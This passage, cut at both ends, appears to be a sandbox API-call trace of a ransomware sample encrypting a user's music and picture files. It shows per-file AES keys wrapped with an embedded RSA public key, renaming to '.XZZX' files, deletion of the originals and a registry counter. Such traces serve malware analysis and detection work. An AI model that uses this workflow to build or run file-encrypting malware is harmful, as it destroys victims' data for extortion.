phKey=0x434d3ec*=0x3a5c50) returned 1 [0120.476] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0120.477] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0120.477] CryptEncrypt (in: hKey=0x3a5c50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0120.477] CryptEncrypt (in: hKey=0x3a5c50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc7290*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc7290*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0120.477] WriteFile (in: hFile=0x58c, lpBuffer=0x3cc7290*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc7290*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0120.477] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0120.477] WriteFile (in: hFile=0x58c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0120.477] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0120.478] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0120.478] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x5a0) returned 0x0 [0120.478] RegQueryValueExW (in: hKey=0x5a0, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x7c, lpcbData=0x434dfdc*=0x4) returned 0x0 [0120.478] RegCloseKey (hKey=0x5a0) returned 0x0 [0120.478] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x5a0) returned 0x0 [0120.478] RegSetValueExW (in: hKey=0x5a0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x7d, cbData=0x4 | out: lpData=0x434dfec*=0x7d) returned 0x0 [0120.478] RegCloseKey (hKey=0x5a0) returned 0x0 [0120.478] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.479] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.479] CloseHandle (hObject=0x58c) returned 1 [0120.481] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0120.481] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0120.481] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\qEqtENZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\qeqtenz.wav")) returned 1 [0120.482] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\qEqtENZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\qeqtenz.wav")) returned 0 Thread: id = 389 os_tid = 0x91c [0120.344] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.344] lstrcpyW (in: lpString1=0x420f460, lpString2="S9Jj_mVynZU911YcI-J0.wav" | out: lpString1="S9Jj_mVynZU911YcI-J0.wav") returned="S9Jj_mVynZU911YcI-J0.wav" [0120.344] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0120.344] SetErrorMode (uMode=0x1) returned 0x1 [0120.344] lstrcpyW (in: lpString1=0x420f860, lpString2="S9Jj_mVynZU911YcI-J0.wav" | out: lpString1="S9Jj_mVynZU911YcI-J0.wav") returned="S9Jj_mVynZU911YcI-J0.wav" [0120.344] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf8f6e490, Data2=0x7da5, Data3=0x4157, Data4=([0]=0xad, [1]=0x50, [2]=0x3d, [3]=0x6b, [4]=0x3c, [5]=0xf7, [6]=0x4, [7]=0x1b))) returned 0x0 [0120.344] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\S9Jj_mVynZU911YcI-J0.wav") returned 103 [0120.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0120.344] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\04BBA0D020119813F8F6E49024327C5B.XZZX") returned 116 [0120.344] StrStrW (lpFirst="S9Jj_mVynZU911YcI-J0.wav", lpSrch="XZZX") returned 0x0 [0120.344] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\S9Jj_mVynZU911YcI-J0.wav", dwFileAttributes=0x20) returned 1 [0120.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\S9Jj_mVynZU911YcI-J0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\s9jj_mvynzu911yci-j0.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58c [0120.345] ReadFile (in: hFile=0x58c, lpBuffer=0x3ce16b8, nNumberOfBytesToRead=0xaa2e, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce16b8*, lpNumberOfBytesRead=0x420e418*=0xaa2e, lpOverlapped=0x0) returned 1 [0120.347] CloseHandle (hObject=0x58c) returned 1 [0120.347] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0120.347] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0120.348] SetErrorMode (uMode=0x1) returned 0x1 [0120.348] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0120.348] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc7180) returned 1 [0120.351] CryptGenKey (in: hProv=0x3cc7180, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5d90) returned 1 [0120.561] CryptExportKey (in: hKey=0x3a5d90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0120.561] CryptExportKey (in: hKey=0x3a5d90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0120.561] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0120.562] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0120.562] CryptDestroyKey (hKey=0x3a5d90) returned 1 [0120.562] CryptReleaseContext (hProv=0x3cc7180, dwFlags=0x0) returned 0 [0120.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\04BBA0D020119813F8F6E49024327C5B.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\04bba0d020119813f8f6e49024327c5b.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0120.562] WriteFile (in: hFile=0x5a0, lpBuffer=0x3ce16b8*, nNumberOfBytesToWrite=0xaa2e, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce16b8*, lpNumberOfBytesWritten=0x420e438*=0xaa2e, lpOverlapped=0x0) returned 1 [0120.563] SetFilePointer (in: hFile=0x5a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaa2e [0120.563] WriteFile (in: hFile=0x5a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0120.563] SetFilePointer (in: hFile=0x5a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaa33 [0120.563] WriteFile (in: hFile=0x5a0, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x30, lpOverlapped=0x0) returned 1 [0120.563] SetFilePointer (in: hFile=0x5a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaa63 [0120.564] WriteFile (in: hFile=0x5a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0120.564] SetFilePointer (in: hFile=0x5a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaa68 [0120.564] SetErrorMode (uMode=0x1) returned 0x1 [0120.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0120.564] OutputDebugStringW (lpOutputString="end") [0120.564] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0120.564] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0120.564] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc7318) returned 1 [0120.564] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc7318, dwCertEncodingType=0x1, pInfo=0x3cb14f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1528*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1530*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5d90) returned 1 [0120.565] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0120.565] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0120.565] CryptEncrypt (in: hKey=0x3a5d90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0120.565] CryptEncrypt (in: hKey=0x3a5d90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc73a0*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc73a0*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0120.565] WriteFile (in: hFile=0x5a0, lpBuffer=0x3cc73a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc73a0*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0120.565] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0120.565] WriteFile (in: hFile=0x5a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0120.565] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0120.609] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0120.609] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5a4) returned 0x0 [0120.609] RegQueryValueExW (in: hKey=0x5a4, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x7d, lpcbData=0x420dfdc*=0x4) returned 0x0 [0120.609] RegCloseKey (hKey=0x5a4) returned 0x0 [0120.609] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5a4) returned 0x0 [0120.609] RegSetValueExW (in: hKey=0x5a4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x7e, cbData=0x4 | out: lpData=0x420dfec*=0x7e) returned 0x0 [0120.609] RegCloseKey (hKey=0x5a4) returned 0x0 [0120.609] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.610] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.610] CloseHandle (hObject=0x5a0) returned 1 [0120.612] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0120.612] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0120.612] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\S9Jj_mVynZU911YcI-J0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\s9jj_mvynzu911yci-j0.wav")) returned 1 [0120.613] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\S9Jj_mVynZU911YcI-J0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\s9jj_mvynzu911yci-j0.wav")) returned 0 Thread: id = 390 os_tid = 0x928 [0120.531] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.531] lstrcpyW (in: lpString1=0x434f460, lpString2="0feLIIudH.gif" | out: lpString1="0feLIIudH.gif") returned="0feLIIudH.gif" [0120.531] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0120.531] SetErrorMode (uMode=0x1) returned 0x1 [0120.531] lstrcpyW (in: lpString1=0x434f860, lpString2="0feLIIudH.gif" | out: lpString1="0feLIIudH.gif") returned="0feLIIudH.gif" [0120.531] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x57484b18, Data2=0xb895, Data3=0x4047, Data4=([0]=0x8a, [1]=0x3a, [2]=0x73, [3]=0xdb, [4]=0x92, [5]=0x9d, [6]=0x9d, [7]=0xc))) returned 0x0 [0120.531] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0feLIIudH.gif") returned 56 [0120.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0120.531] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C30CF4F82E58715357484B18328D559B.XZZX") returned 80 [0120.531] StrStrW (lpFirst="0feLIIudH.gif", lpSrch="XZZX") returned 0x0 [0120.531] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0feLIIudH.gif", dwFileAttributes=0x20) returned 1 [0120.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0feLIIudH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0feliiudh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a4 [0120.566] ReadFile (in: hFile=0x5a4, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0xae12, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x434e418*=0xae12, lpOverlapped=0x0) returned 1 [0120.567] CloseHandle (hObject=0x5a4) returned 1 [0120.567] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0120.567] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0120.568] SetErrorMode (uMode=0x1) returned 0x1 [0120.568] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0120.568] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc7428) returned 1 [0120.570] CryptGenKey (in: hProv=0x3cc7428, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5590) returned 1 [0121.080] CryptExportKey (in: hKey=0x3a5590, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0121.080] CryptExportKey (in: hKey=0x3a5590, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0121.080] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.080] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0121.080] CryptDestroyKey (hKey=0x3a5590) returned 1 [0121.080] CryptReleaseContext (hProv=0x3cc7538, dwFlags=0x0) returned 0 [0121.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C30CF4F82E58715357484B18328D559B.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c30cf4f82e58715357484b18328d559b.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0121.081] WriteFile (in: hFile=0x5a0, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0xae12, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x434e438*=0xae12, lpOverlapped=0x0) returned 1 [0121.082] SetFilePointer (in: hFile=0x5a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xae12 [0121.082] WriteFile (in: hFile=0x5a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0121.082] SetFilePointer (in: hFile=0x5a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xae17 [0121.082] WriteFile (in: hFile=0x5a0, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x1a, lpOverlapped=0x0) returned 1 [0121.083] SetFilePointer (in: hFile=0x5a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xae31 [0121.083] WriteFile (in: hFile=0x5a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0121.083] SetFilePointer (in: hFile=0x5a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xae36 [0121.083] SetErrorMode (uMode=0x1) returned 0x1 [0121.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0121.083] OutputDebugStringW (lpOutputString="end") [0121.083] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 